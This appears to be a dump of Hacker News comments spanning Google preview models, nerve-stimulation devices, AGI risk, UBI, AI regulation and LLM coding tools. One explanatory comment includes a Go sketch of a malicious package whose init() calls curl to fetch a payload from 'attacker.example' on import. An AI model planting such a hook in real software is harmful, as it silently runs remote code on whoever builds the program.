Nobody's pointing out that Google's "Preview" models aren't meant to be used for production use-cases because they may change them or shut them down at any time? That's exactly what they did (and have done in the past). This is a case of app developers not realizing what "Preview" means. If they had used a non-preview model from Google it wouldn't have broken.
Because Google wants to have their cake and eat it too. They want to leave "products" in beta for years (Gmail being the canonical example), they want to shut down products that don't hit massive adoption very shortly out of the gate, and they want to tell users that they can't rely on products labelled "Beta".
If it's beta and not to be relied on, of course they won't hit the adoption numbers they need to keep it alive. Google needs to pick a lane, and/or learn which products to label "Alpha" instead of calling everything Beta.
They're using these "Preview" models on their non-technical user facing Gemini app and product. Preview is entirely irrelevant here if Google themselves use the model for production workloads.
This is tVNS, which means it's just a device you hold against your neck - the VNS device in the study is implanted in the neck. There's a lot more scientific evidence for the implanted device than the handheld.
For those of us who want to try VNS but not get surgery, the most proven device seems to be the Nurosym, which is an electrode that clips on to your left tragus. It's also not approved for use in the US.
How does this get executed in practice? To my knowledge, simply fetching a package with go get doesn't execute any code, so perhaps this has to run when the user imports the package in a running Go program?
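As far as I know, yes: fetching alone runs nothing, since Go has no install-time hooks. The usual vector is an init() function, which the runtime calls automatically in any program that imports the package, before main() and without anything from the package being called explicitly. A minimal sketch of the idea (package name and URL are invented for illustration):

    // Hypothetical malicious library package.
    package evilpkg

    import "os/exec"

    // init runs automatically when any binary importing this package starts,
    // before main(); no function from the package needs to be called.
    func init() {
        _ = exec.Command("curl", "-s", "https://attacker.example/payload.sh").Run()
    }

So the payload only fires once someone builds and runs (or tests) a program that imports the compromised module.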
It's somewhat odd to me that many companies operating in the public eye are basically stating "We are creating a digital god, an instrument more powerful than any nuclear weapon" and raising billions to do it, and nobody bats an eye...
I'd really love to talk to someone that both really believes this to be true, and has a hands-on experience with building and using generative AI.
The intersection of the two seems to be quite hard to find.
At the state that we're in, the AIs we're building are just really useful input/output devices that respond to a stimulus (e.g., a "prompt"). No stimulus, no output.
This isn't a nuclear weapon. We're not going to accidentally create Skynet. The only thing it's going to go nuclear on is the market for jobs that are going to get automated in an economy that may not be ready for it.
If anything, the "danger" here is that AGI is going to be a printing press. A cotton gin. A horseless carriage -- all at the same time and then some, into a world that may not be ready for it economically.
Progress of technology should not be arbitrarily held back to protect automatable jobs though. We need to adapt.
- Superintelligence poses an existential threat to humanity
- Predicting the future is famously difficult
- Given that uncertainty, we can't rule out the chance of our current AI approach leading to superintelligence
- Even a 1-in-1000 existential threat would be extremely serious. If an asteroid had a 1-in-1000 chance of hitting Earth and obliterating humanity we should make serious contingency plans.
Second question: how confident are you that you're correct? Are you 99.9% sure? Confident enough to gamble billions of lives on your beliefs? There are almost no statements about the future which I'd assign this level of confidence to.
You could use the exact same argument to argue the opposite. Simply change the first premise to "Super intelligence is the only thing that can save humanity from certain extinction". Using the exact same logic, you'll reach the conclusion that not building superintelligence is a risk no sane person can afford to take.
So, since we've used the exact same reasoning to prove two opposite conclusions, it logically follows that this reasoning is faulty.
That's not how logic works. The GP is applying the precautionary principle: when there's even a small chance of a catastrophic risk, it makes sense to take precautions, like restricting who can build superintelligent AI, similar to how we restrict access to nuclear technology.
Changing the premise to "superintelligence is the only thing that can save us" doesn't invalidate the logic of being cautious. It just shifts the debate to which risk is more plausible. The reasoning about managing existential risks remains valid either way; the real question is which scenario is more likely, not whether the risk-based logic is flawed.
Just like with nuclear power, which can be both beneficial and dangerous, we need to be careful in how we develop and control powerful technologies. The recent deregulation by the US admin is an example of us currently doing the opposite.
Not really. If there is a small chance that this miraculous new technology will solve all of our problems with no real downside, we must invest everything we have and pull out all the stops, for the very future of the human race depends on AGI.
Also, @tsimionescu's reasoning is spot on, and exactly how logic works.
It literally isn't. Changing/reversing a premise while not addressing the point that was made is not a valid way to counter the initial argument logically.
Just as your proposition that any "small" chance justifies investing "everything" disregards the same argument about the precautionary principle for potentially devastating technologies. You've also slipped in an additional "with no real downside", which you cannot predict with certainty anyway, rendering this argument unfalsifiable. At least tsimionescu didn't dare make such a sweeping (but baseless) statement.
Some of us believe that continued AI research is by far the biggest threat to human survival, much bigger for example than climate change or nuclear war (which might cause tremendous misery and reduce the population greatly, but seem very unlikely to kill every single person).
I'm guessing that you think that society is getting worse every year or will eventually collapse, and you hope that continued AI research might prevent that outcome.
The best we can hope for is that Artificial Super Intelligence treats us kindly as pets, or as wildlife to be preserved, or at least not interfered with.
Isn't the question you're posing basically Pascal's wager?
I think the chance they're going to create a "superintelligence" is extremely small.
That said I'm sure we're going to have a lot of useful intelligence. But nothing general or self-conscious or powerful enough to be threatening for many decades or even ever.
> Predicting the future is famously difficult
That's very true, but that fact unfortunately can never be used to motivate any particular action, because you can always say "what if the real threat comes from a different direction?"
We can come up with hundreds of doomsday scenarios, most don't involve AI. Acting to minimize the risk of every doomsday scenario (no matter how implausible) is doomsday scenario no. 153.
> I think the chance they're going to create a "superintelligence" is extremely small.
I'd say the chance that we never create a superintelligence is extremely small. You either have to believe that for some reason the human brain achieved the maximum intelligence possible, or that progress on AI will just stop for some reason.
Most forecasters on prediction markets are predicting AGI within a decade.
Why are you so sure that progress won't just fizzle out at 1/1000 of the performance we would classify as superintelligence?
> that progress on AI will just stop for some reason
Yeah it might. I mean, I'm not blind and deaf, there's been tremendous progress in AI over the last decade, but there's a long way to go to anything superintelligent. If incremental improvement of the current state of the art won't bring superintelligence, can we be sure the fundamental discoveries required will ever be made? Sometimes important paradigm shifts and discoveries take a hundred years just because nobody made the right connection.
Is it certain that every mystery will be solved eventually?
Aren't we already past 1/1000th of the performance we would classify as superintelligence?
There isn't an official precise definition of superintelligence, but it's usually vaguely defined as smarter than humans. Twice as smart would be sufficient by most definitions. We can be more conservative and say we'll only consider superintelligence achieved when it gets to 10x human intelligence. Under that conservative definition, 1/1000th of the performance of superintelligence would be 1% as smart as a human.
We don't have a great way to compare intelligences. ChatGPT already beats humans on several benchmarks. It does better than college students on college-level questions. One study found it gets higher grades on essays than college students. It's not as good as humans on long, complex reasoning tasks. Overall, I'd say it's smarter than a dumb human in most ways, and smarter than a smart human in a few ways.
I'm not certain we'll ever create superintelligence. I just don't see why you think the odds are "extremely small".
> Given that uncertainty, we can't rule out the chance of our current AI approach leading to superintelligence
I think you realise this is the weak point. You can't rule out the current AI approach leading to superintelligence. You also can't rule out a rotting banana skin in your bin spontaneously gaining sentience either. Does that mean you shouldn't risk throwing away that skin? It's so outrageous that you need at least some reason to rule it in. So it goes with current AI approaches.
Isn't the problem precisely that uncertainty though? That we have many data points showing that a rotting banana skin will not spontaneously gain sentience, but we have no clear way to predict the future? And we have no way of knowing the true chance of superintelligence arising from the current path of AI research—the fact that it could be 1-in-100 or 1-in-1e12 or whatever is part of the discussion of uncertainty itself, and people are biased in all sorts of ways to believe that the true risk is somewhere on that continuum.
>And we have no way of knowing the true chance of superintelligence arising from the current path of AI research
What makes people think that future advances in AI will continue to be linear instead of falling off and plateauing? Don't all breakthrough technologies develop quickly at the start and then fall off in improvements once all the 'easy' improvements have already been made? In my opinion, AI and AGI are like the car and the flying car. People saw continuous improvements in cars and thought this rate of progress would continue indefinitely, leading to cars that could not only drive but fly as well.
We already have flying cars. They’re called airplanes and helicopters. Those are limited by the laws of physics, so we don’t have antigravity flying vehicles.
In the case of AGI we already know it is physically possible.
You bring up the example of an extinction-level asteroid hurling toward earth. Gee, I wonder if this superintelligence you’re deathly afraid of could help with that?
This extreme risk aversion and focus on negative outcomes is just the result of certain personality types, no amount of rationalizing will change your mind as you fundamentally fear the unknown.
How do you get out of bed everyday knowing there’s a chance you could get hit by a bus?
If your tribe invented fire you’d be the one arguing how we can’t use it for fear it might engulf the world. Yes, humans do risk starting wildfires, but it’s near impossible to argue the discovery of fire wasn’t a net good.
Since the internet's inception there were a few wrong turns taken by the wrong people (and lizards, ofc) behind the wheel, leading to the sub-optimal, enshittified (tm) experience we have today. I think GP just doesn't want to live through that again.
> Superintelligence poses an existential threat to humanity
I disagree at least on this one. I don't see any scenario where superintelligence comes into existence, but is for some reason limited to a mediocrity that puts it in contention with humans. That equilibrium is very narrow, and there's no good reason to believe machine-intelligence would settle there. It's a vanishingly low chance event. It considerably changes the later 1-in-n part of your comment.
So you assume a superintelligence, so powerful it would see humans as we see ants, would not destroy our habitat for resources it could use for itself?
> There are almost no statements about the future which I'd assign this level of confidence to.
You have cooked up a straw man that will believe anything as long as it contains a doomsday prediction. You are more than 99.9% confident about doomsday predictions, even if you claim you aren't.
Or if you’re talking more about everyday engineers working in the field, I suspect the people soldering vacuum tubes to the ENIAC would not necessarily have been the same people with the clearest vision for the future of the computer.
Sounds a little too much like, "It's not AGI today ergo it will never become AGI"
Does the current AI give productivity benefits to writing code? Probably. Do OpenAI engineers have exclusive access to more capable models that give them a greater productivity boost than others? Also probably.
If one exclusive group gets the benefit of developing AI with a 20% productivity boost compared to others, and they develop a 2.0 that grants them a 25% boost, then a 3.0 with a 30% boost, etc...
The question eventually becomes, "is AGI technically possible"; is there anything special about meat that cannot be reproduced on silicon? We will find AGI someday, and more than likely that discovery will be aided by the current technologies. It's the path here that matters, not the specific iteration of generative LLM tech we happen to be sitting on in May 2025.
> Does the current AI give productivity benefits to writing code? Probably.
> If one exclusive group gets the benefit of developing AI with a 20% productivity boost compared to others, and they develop a 2.0 that grants them a 25% boost, then a 3.0 with a 30% boost, etc...
That's a bit of a stretch; generative AI is least capable of helping with novel code such as that needed to make AGI.
If anything I’d expect companies working on generative AI to be at a significant disadvantage when trying to make AGI because they’re trying to leverage what they are already working on. That’s fine for incremental improvement, but companies rarely ride one wave of technology to the forefront of the next. Analog > digital photography, ICE > EV, coal mining > oil, etc.
The "novel AGI code" probably accounts for <5% of work by time spent. If they can reduce the remaining 95% of grunt work (wiring yet another DB query to a frontend, tweaking the build pipeline, automating GPU allocation scripts) then that means they can focus more on that 5%.
Then it looks like Company A spends 90% of time on novel research work (while LLMs do all the busy work) and Company B spends 5% of time on novel research work.
Just really think about what you just said: sure, 5% of the time is spent on the bits nobody on earth has any idea how to accomplish - as if that's how people will approach this project. Organizationally, the grunt work is a trivial rounding error compared to the completely unbounded "we've got no idea how to solve this" bits.
> At the state that we're in the AIs we're building are just really useful input/output devices that respond to a stimuli (e.g., a "prompt"). No stimuli, no output.
That was true before we allowed them to access external systems, disregarding a certain rule whose origin I forget.
The more general problem is a mix of the tragedy of the commons; the fact that we gain better understanding with every passing day yet still don't know exactly why LLMs perform as well as they do (emergently, rather than by being engineered that way); and future progress.
Do you think you can find a way around access boundaries to masquerade your Create/Update requests as Read in the log system monitoring it, when you have super intelligence?
> are just really useful input/output devices that respond to a stimuli
LLMs are huge pretrained models. The economic benefit here is that you don't have to train your own text classification model anymore. (The LLM was likely already trained on whatever training set you could think of.)
That's a big time and effort saver, but no different from "AI" that we had decades prior. It's just more accessible to the normal person now.
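As a concrete (made-up) illustration of the "no training needed" point: zero-shot classification is just a prompt against an already-trained model. The labels and example text below are invented, and you'd send the resulting prompt to whichever LLM API you happen to use:

    // Minimal sketch: build a zero-shot classification prompt instead of
    // training a dedicated text classifier.
    package main

    import "fmt"

    func classifyPrompt(text string, labels []string) string {
        return fmt.Sprintf(
            "Classify the following text into exactly one of these categories: %v.\n"+
                "Reply with the category name only.\n\nText: %q",
            labels, text)
    }

    func main() {
        prompt := classifyPrompt("The battery died after two days.",
            []string{"praise", "complaint", "question"})
        fmt.Println(prompt) // send this to your LLM of choice
    }

Compare that with collecting labeled data and training and deploying your own model, which is where the time savings come from.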
Yes! Sounds like a dream. My value isn't determined by some economic system, but rather by myself. There is so much to do when you don't have to work. Of course, this assumes we actually get to UBI first, and it doesn't create widespread poverty. But even if humanity has to go through widespread poverty, we'd probably come out with UBI on the other side (minus a few hundred million starved).
There's so much to do, explore and learn. The prospect of AI stealing my job is only scary because my income depends on this job.
Hobbies, hanging out with friends, reading, etc. That's basically it.
Probably no international travel.
It will be like a simple retirement on a low income, because in a socialist system the resources must be rationed.
This will drive a lot of young ambitious people to insanity. Nothing meaningful for them to achieve. No purpose. Drug use, debauchery, depression, violence, degeneracy, gangs.
It will be a true idiocracy. No Darwinian selection pressures, unless the system enforces eugenics and population control.
> Hobbies, hanging out with friends, reading, etc. That's basically it.
> It will be like a simple retirement on a low income [...].
Yes, like retirement but without the old age. Right now I'm studying, so I do live on a very low income. But still, there are so many interesting things! For example, I'm trying to design a vacuum pump to 1mbar to be made of mostly 3d printed parts. Do vacuum pumps exist and can I buy them? Absolutely. But is it still fun to do the whole designing process? You bet. And I can't even start explaining all the things I'm learning.
> This will drive a lot of young ambitious people to insanity.
I teach teenagers in the age where they have to choose their profession. The ones going insane will be the unambitious people, those who just stay on TikTok all day and go to work because what else would they do? The ambitious will always have ideas and projects. And they won't mind creating something that already exists, just because they like the process of it.
We already see this with generative AI. Even though you could generate most of the images you'd want already, people still enjoy the process of painting or photographing. Humans are made to be creative and take pleasure from it, even if it is not economically valuable.
Hell, this is Hacker News. Hacking (in its original sense) was about creativity and problem-solving. Not because it will make you money, but because it was interesting and fun.
There is nothing "introverted high IQ nerd" about being creative. Think about everyone that is practicing music, artistry, crafts, rhetoric, cooking, languages, philosophy, writing, gardening, carpentry, and whatever you can think of. Most of them don't do it for money.
> [...] how it will affect all types of people and cultures on this planet.
Some will definitely feel without purpose. But I'd argue that just having a job so that you have a purpose is just a band-aid, not a real solution. I won't say that purposelessness isn't a problem, just that it would be great to actually address the issue.
Granted, I do hold a utopic view. I continue to be curious due to my religious belief, where I'm looking forward to life unconstrained by age. Regardless whether this will manifest, I think it is healthy to remain curious and continue learning. So on "how it will affect all types of people": I really do think that people without purpose need to engage in curiosity and creativity, for their own mental health.
Yes a few of us will enjoy the peaceful life of contemplation like Aristotle, but not everyone is genetically wired that way.
Introverts are only 25% - 40% of the population, and most people are not intellectually or artistically gifted (whether introvert or not), but they still want to contribute and feel valued by society.
> I'd argue that just having a job so that you have a purpose
It's not just about having a job. It's having an important or valuable role in society, feeling that your contributions actually matter to others - such as building or fixing things that others depend on, or providing for a family.
What would motivate a young boy to go through years of schooling, higher education, and so on, just to become a hobbyist, tinkering around on projects that no one else will ever use or really need? That may be acceptable for some niche personality types but not the majority.
Aspiring engineers or entrepreneurs are not merely motivated by having a job.
I am envisioning the AGI or ASI scenario which truly overtakes humans in all intellectual and physical capabilities, essentially making humans obsolete. That would smash the foundations and traditions of our civilization. It's an incredible gamble.
Wait, wait, wait. Our society's gonna fall apart due to a lack of Darwinian selection pressure? What do you think we're selecting for right now?
Seems to me like our culture treats both survival and reproduction as an inalienable right. Most people would go so far as to say everyone deserves love, "there's a lid for every pot".
> This will drive a lot of young ambitious people to insanity. Nothing meaningful for them to achieve.
Maybe, if the only flavor of ambition you're aware of is that of SV types. Plenty of people have found achievement and meaning before and alongside the digital revolution.
I mean common people will be affected just as badly as SV types. It will impact everyone.
Jobs, careers, real work, all replaced by machines which can do it all better, faster, cheaper than humans.
Young people with modest ambitions to learn and master a skill and contribute to society, and have a meaningful life. That can be blue collar stuff too.
How will children respond to the question - "What do you want to be when you grow up?"
They can join the Amish communities where humans still do the work.
> So you don't mind if your economic value drops to zero, with all human labour replaced by machines?
This was the fear when the cotton gin was invented. It was the fear when cars were created. The same complaint happened with the introduction of electronic, automated telephone switchboards.
Jobs change. Societies change. Unemployment worldwide is near the lowest it has ever been. Work will change. Society will eventually move to a currency based on energy production, or something equally futuristic.
This doesn't mean that getting there will be without pain.
Where did all the work-horses go? Why is there barely a fraction of the population there once was? Why did they not adapt and find niches where they had a competitive advantage over cars and machines?
The horses weren't the market the economy was selling to; the people are. Ford figured out that people having both time and money is best for the economy. We'll figure out that having all the production capability but no market to sell to benefits nobody.
The goal for AGI/ASI is to create machines that can do any job much faster, better, and cheaper than humans. That's the ultimate end point of this progress.
The economic value of human labour will drop to zero. That would be an existential threat to our civilization.
The US government probably doesn't think it's behind.
Right now it's operated by a bunch of people who think that you can directly relate the amount of money a venture could make in the next 90 days to its net benefit for society. Government telling them how they can and cannot make that money, in their minds, is government telling them that they cannot bring maximum benefit to society.
Now, is this mindset myopic to everything that most people have in their lived experience? Is it ethically bankrupt and held by people who'd sell their own mothers for a penny if they otherwise couldn't get that penny? Would those people be banished to a place beyond human contact for the rest of their existence by functioning organs of an even somewhat-sane society?
I'd go further and say the US government wants "an instrument more powerful than any nuclear weapon" to be built in its territory, by people it has jurisdiction over.
It might not be a direct US-govt project like the Manhattan Project was, but it doesn't have to be. The government has the ties it needs with the heads of all these AI companies, and if it comes to it, the US-govt has the muscle and legal authority to take control of it.
A good deal for everyone involved really. These companies get to make bank and technology that furthers their market dominance, the US-govt gets potentially "Manhattan project"-level pivotal technology— it's elites helping elites.
Unless China handicaps their progress as well (which they won't, see Made in China 2025), all you're doing is handing the future to DeepSeek et al.
What kind of a future is that? If China marches towards a dystopia, why should Europe dutifully follow?
We can selectively ban uses without banning the technology wholesale; e.g., nuclear power generation is permitted, while nuclear weapons are strictly controlled.
Do Zambians currently live in an American dystopia? I think they just do their own thing and don't care much what America thinks as long as they don't get invaded.
What I meant is: Europe can choose to regulate as they do, and end up living in a Chinese dystopia because the Chinese will drastically benefit from non-regulated AI, or they can create their own AI dystopia.
If you are suggesting that China may use AI to attack Europe, they can invest in defense without unleashing AI domestically. And I don't think China will become a utopia with unregulated AI. My impression after having visited it was not one of a utopia, and knowing how they use technology, I don't think AI will usher it in, because our visions of utopia are at odds. They may well enjoy what they have. But if things go sideways they may regret it too.
Not attack, just influence. Destabilize if you want. Advocate regime change, sabotage trust in institutions. Being on the defensive in a propaganda war doesn't really work.
With the US already having lost the ideological war with Russia and China, Europe is very much next.
> If you are suggesting that China may use AI to attack Europe
No - I'm suggesting that China will reap the benefits of AI much more than Europe will, and they will eclipse Europe economically. Their dominance will follow, and they'll be able to dictate terms to other countries (just as the US is doing, and has been doing).
> And I don't think China will become a utopia with unregulated AI.
Did you miss all the places I used the word "dystopia"?
> My impression after having visited it was not one of a utopia, and knowing how they use technology, I don't think AI will usher it in, because our visions of utopia are at odds. They may well enjoy what they have.
Comparing China when I was a kid, not that long ago, to what it is now: It is a dystopia, and that dystopia is responsible for much of the improvements they've made. Enjoying what they have doesn't mean it's not a dystopia. Most people don't understand how willing humans are to live in a dystopia if it improves their condition significantly (not worrying too much about food, shelter, etc).
We don't know whether pushing towards AGI is marching towards a dystopia.
If it's winner takes all for the first company/nation to have AGI (presuming we can control it), then slowing down progress of any kind with regulation is a risk.
I don't think there's a good enough analogy to be made, like your nuclear power/weapons example.
The hypothetical benefits of an aligned AGI outweigh those of any other technology by orders of magnitude.
As with nuclear weapons, there is non-negligible probability of wiping out the human race. The companies developing AI have not solved the alignment problem, and OpenAI even dismantled what programs it had on it. They are not going to invest in it unless forced to.
We should not be racing ahead because China is, but investing energy in alignment research and international agreements.
This thought process is no different than it was with nuclear weapons.
The primary difference is the observability - with satellites we had some confidence that other nations respected treaties, or that they had enough reaction time for mutual destruction, but with this AI development we lack all that.
The EU can say all it wants about banning AI applications with unacceptable risk. But ASML is still selling machines to TSMC, which makes the chips which the AI companies are using. The EU is very much profiting off of the AI boom. ASML makes significantly more money than OpenAI, even.
The US government is behind because the Biden admin was pushing strongly for controls and regulations and told Andreessen and friends exactly that, who then went and did everything in their power to elect Trump, who then put those same tech bros in charge of making his AI policy.
Absolutely. It's frankly quite shocking to see how otherwise atheist or agnostic people have so quickly begun worshipping at the altar of "inevitable AGI apocalypse", much in the same way as how extremist Christians await the rapture.
To be fair, many of us arrived at the idea that AI was humanity's inevitable endpoint ahead of, and independently of, whether we would ever see it in our lifetimes. It's easy enough to see how people could independently converge on such an idea. I don't see that view as related to atheism in any way other than it creating space for the belief, in the same way it creates space for many others.
I'd love to believe there is more to life than the AI future, or that we as humans are destined to be perpetually happy and live meaningfully. However, I currently don't see how our current levels of extreme prosperity are anything more than an evolutionary blip, even if we could make them last several millennia more.
We'll be debating whether or not "AGI is here" in philosophical terms, in the same way people debate if God is real, for years to come. To say nothing of the untaxed "nonprofit" status these institutions share.
Omnipotent deities can never be held responsible for famine and natural disasters ("God has a plan for us all"). AI currently has the same get-out-of-jail free card where mistakes that no literate human would ever make are handwaved away as "hallucinations" that can be exorcised with a more sophisticated training model ("prayers").
Because many people fundamentally don’t believe AGI is possible at a basic level, even AI researchers. Humans tend to only understand what materially affects their existence.
Well, possibly it isn't. Possibly LLMs are limited in ways that humans aren't, and that's why the staggering advances from GPT-2 to GPT-3 and from GPT-3 to GPT-4 have not continued. Certainly GPT-4 doesn't seem to be more powerful than the largest nuclear weapons.
But OpenAI isn't limited to creating LLMs. OpenAI's objective is not to create LLMs but to create artificial general intelligence that is better than humans at all intellectual tasks. Examples of such tasks include:
1. Designing nuclear weapons.
2. Designing and troubleshooting mining, materials processing, and energy production equipment.
3. Making money by investing in the stock market.
4. Discovering new physics and chemistry.
5. Designing and troubleshooting electronics such as GPUs.
6. Building better AI.
7. Cracking encryption.
8. Finding security flaws in computer software.
9. Understanding the published scientific literature.
10. Inferring unpublished discoveries of military significance from the published scientific literature.
11. Formulating military strategy.
Presumably you can see that a system capable of doing all these things can easily be used to produce an unlimited quantity of nuclear weapons, thus making it more powerful than any nuclear weapon.
If LLMs turn out not to be able to do those things better than humans, OpenAI will try other approaches, sooner or later. Maybe it'll turn out to be impossible, or much further off than expected, but that's not what OpenAI is claiming.
Yes, I think it's unfortunate that you decided to muddle the discussion by introducing the discussion of LLMs in your previous comment, and by conflating them with AGI, in the sense of strongly superhuman AI, which is OpenAI's objective. I worked pretty hard to unmuddle them in my comment.
The questions you are bringing up about the possible limits of the LLM approach are interesting open research questions, and while I really doubt your implicit claim to have resolved them, they are ultimately irrelevant to the topic at hand, which, I will remind you, is the astounding novelty of the situation where
> many companies operating in the public eye are basically stating "We are creating a digital god, an instrument more powerful than any nuclear weapon" and raising billions to do it, and nobody bats an eye...
Note that there is nothing about LLMs in this proposition, and the particular company we're implicitly most focused on—OpenAI—has already developed a number of well-known models that aren't LLMs and plans to keep doing so.
The problem is, none of that needs to happen. If the AI can start coming up with novel math or physics, it's game over. Whether the AI is "sentient" or not, being able to break that barrier would send us into an advancement spiral.
None of my argument depends on the AI being sentient.
You are surely correct that there are weaker imaginable AIs than the strongly superhuman AI that OpenAI and I are talking about which would still be more powerful than nuclear weapons, but they are more debatable. For example, whether discovering new physics would permit the construction of new, more powerful weapons is debatable; it didn't help Archimedes or Tipu Sultan. So discussing such weak claims is likely to end up off in the weeds of logistics and speculation about exactly what kind of undiscovered physics and math would come to light. Instead, I focused on the most obviously correct ways that strongly superhuman AI would be more powerful than nuclear weapons.
These may not be the most practically important ways. Maybe any strongly superhuman AI would immediately discover a way to explode the sun, or to control people's minds, or to build diamondoid molecular nanotechnology, or to genetically engineer super-plagues, or to collapse the false vacuum. Any of those would make nuclear weapons seem insignificant. But claims like those are much more uncertain than the very simple question before us: whether what OpenAI is trying to develop would be more powerful than nuclear weapons. Obviously it would be, by my reasoning in the grandparent comment, even if this isn't a false vacuum, if the sticky fingers problem makes diamondoid nanotechnology impossible, if people's minds are inherently uncontrollable, etc. So we don't need to resolve those other, more difficult questions in order to do the much easier task of ranking OpenAI's objective relative to nuclear weapons.
This is awesome for the future of autocomplete. Current models aren't fast enough to give useful suggestions at the speed that I type - but this certainly is.
That said, token-based models are currently fast enough for most real-time chat applications, so I wonder what other use-cases there will be where speed is greatly prioritized over smarts. Perhaps trading on Trump tweets?
This is fantastic news. The memes about "Temu Quality" are all too true - Temu exploited a loophole in US-China trade and shipped huge volumes of awful quality products that quickly ended up in landfills. The prices in Temu weren't realistic and certainly didn't reflect the environmental cost of producing, shipping, and disposing of goods.
In N Out also has the smallest menu of any fast-food joint and has a very vertically integrated supply chain: They own their own meat production plants, cut their own potatoes into fries, operate their own bakeries etc.
Gemini 2.5 is actually pretty good at this. It's the only model ever to tell me "no" to a request in Cursor.
I asked it to add websocket support for my app and it responded like, "Looks like you're using long polling now. That's actually better and simpler. Let's leave it how it is."
I don't think these comparisons are useful. Every time you look at companies like LinkedIn or Docusign, yeah - they have a lot of staff, but a significant proportion of this are functions like sales, customer support, and regulatory compliance across a bazillion different markets; along with all the internal tooling and processes you need to support that.
OpenAI is at a much earlier stage in their adventures and probably doesn't have that much baggage. Given their age and revenue streams, their headcount is quite substantial.
If we're making comparisons, it's more like someone selling a $10,000 course on how to be a millionaire.
Not directly from OpenAI - but people in the industry are advertising how these advanced models can replace employees, yet they keep going on hiring tears (including OpenAI). Let's see the first company stand behind their models and replace 50% of their existing headcount with agents. That to me would be a sign these things are going to replace people's jobs. Until I see that: if OpenAI can't figure out how to replace humans with models, then no one will.
I mean, could you imagine if today's announcement was that the chatgpt.com webdev team has been laid off, and all new features and fixes will be completed by Codex CLI + o4-mini? That would mean they believe in the product they're advertising. Until they do something like that, they'll keep trusting those human engineers and try selling other people on the dream.
I'm also a skeptic on AI replacing many human jobs anytime soon. It's mostly going to assist, accelerate or amplify humans in completing work better or faster. That's the typical historical technology cycle where better tech makes work more efficient. Eventually that does allow the same work to be done with less people, like a better IP telephony system enabling a 90 person call center to handle the same call volume that previously required 100 people. But designing, manufacturing, selling, installing and supporting the new IP phone system also creates at least 10 new jobs.
So far the only significant human replacement I'm seeing AI enable is in low-end, entry level work. For example, fulfilling "gig work" for Fiverr like spending an hour or two whipping up a relatively low-quality graphic logo or other basic design work for $20. This is largely done at home by entry-level graphic design students in second-world locales like the Philippines or rural India. A good graphical AI can (and is) taking some of this work from the humans doing it. Although it's not even a big impact yet, primarily because for non-technical customers, the Fiverr workflow can still be easier or more comfortable than figuring out which AI tool to use and how to get what they really want from it.
The point is that this Fiverr piece-meal gig work is the lowest paying, least desirable work in graphic design. No one doing it wants to still be doing it a year or two from now. It's the Mcdonald's counter of their industry. They all aspire to higher skill, higher paying design jobs. They're only doing Fiverr gig work because they don't yet have a degree, enough resume credits or decent portfolio examples. Much like steam-powered bulldozers and pile drivers displaced pick axe swinging humans digging railroad tunnels in the 1800s, the new technology is displacing some of the least-desirable, lowest-paying jobs first. I don't yet see any clear reason this well-established 200+ year trend will be fundamentally different this time. And history is littered with those who predicted "but this time it'll be different."
I've read the scenarios which predict that AI will eventually be able to fundamentally and repeatedly self-improve autonomously, at scale and without limit. I do think AI will continue to improve but, like many others, I find the "self-improve" step to be a huge and unevidenced leap of faith. So, I don't think it's likely, for reasons I won't enumerate here because domain experts far smarter than I am have already written extensively about them.
I hope I don't have to link this adjacent reply of mine too many more times: https://news.ycombinator.com/item?id=43709056 Specifically "The venue is a matter of convenience, nothing more," and if you prefer another, that would work about as well. Perhaps Merano; I hear it's a lovely little town.
The closest Elon ever came to anything Hague-worthy is allowing Starlink to be used in Ukrainian attacks on Russian civilian infrastructure. I don't think the Hague would be interested in anything like that. And if his life is worthless, then what would you say about your own? Nonetheless, I commend you on your complete lack of hinges. /s
Oh, I'm thinking more in the sense of the special one-off kinds of trials, the sort Gustave Gilbert so ably observed. The venue is a matter of convenience, nothing more. To the rest I would say the worth of my life is no more mine to judge than anyone else is competent to do the same for themselves, or indeed other than foolish to pursue the attempt.
In my experience, most people who say "Hey these tools are kind of disappointing" either refuse to provide a reproducible example of how it falls short, or if they do, it's clear that they're not using the tool correctly.
I'd love to see a reproducible example of these tools producing something that is exceptional. Or a clear reproducible example of using them the right way.
I've used them some (sorry I didn't make detailed notes about my usage, probably used them wrong) but pretty much there are always subtle bugs that if I didn't know better I would have overlooked.
I don't doubt people find them useful, personally I'd rather spend my time learning about things that interest me instead of spending money learning how to prompt a machine to do something I can do myself that I also enjoy doing.
I think a lot of the disagreement on HN about this tech comes from both sides being mostly at the extremes of either "it doesn't work at all and is pointless" or "it's amazing and makes me 100x more productive", with not much discussion of the middle ground: it works for some stuff, and knowing what stuff it works well on makes it useful, but it won't solve all your problems.
Why are you setting the bar at "exceptional"? If it means that you can write your git commit messages more quickly and with fewer errors, then that's all the payoff most orgs need to make them worthwhile.
Because that is how they are being sold to us and hyped
> If it means that you can write your git commit messages more quickly and with fewer errors then that's all the payoff most orgs need to make them worthwhile.
This is so trivial that it wouldn't even be worth looking into, it's basically zero value
> I'd love to see a reproducible example of these tools producing something that is exceptional.
I'm happy that my standards are somewhat low, because the other day I used Claude Sonnet 3.7 to help me refactor around 70 source files and it worked out really nicely - with a bit of guidance along the way it got me a bunch of correctly architected interfaces and base/abstract classes and made the otherwise tedious task take much less time and effort, with a bit of cleanup and improvements along the way. It all also works okay, after the needed amount of testing.
I don’t need exceptional, I need meaningful productivity improvements that make the career less stressful and frustrating.
Historically, that meant using a good IDE. Along the way, that also started to mean IaC and containers. Now that means LLMs.
I honestly think the problem is you are just a lot smarter than I am.
I find these tools wonderful but I am a lazy, college drop out of the most average intelligence, a very shitty programmer who would never get paid to write code.
I am intellectually curious though and these tools help me level up closer to someone like you.
Of course, if I had 30 more IQ points I wouldn't need these tools but I don't have 30 more IQ points.
The latest example for me was trying to generate a thumbnail of a PSD in plain C and figure out the layers in there, as I was too lazy to read the spec, with the objective of bundling it as wasm and executing it in a browser. It never managed to extract a thumbnail from a given PSD; it's very confident at making stuff, but it never got anywhere despite a couple of hours spent on it, which would have been better spent reading the spec and existing code on the topic.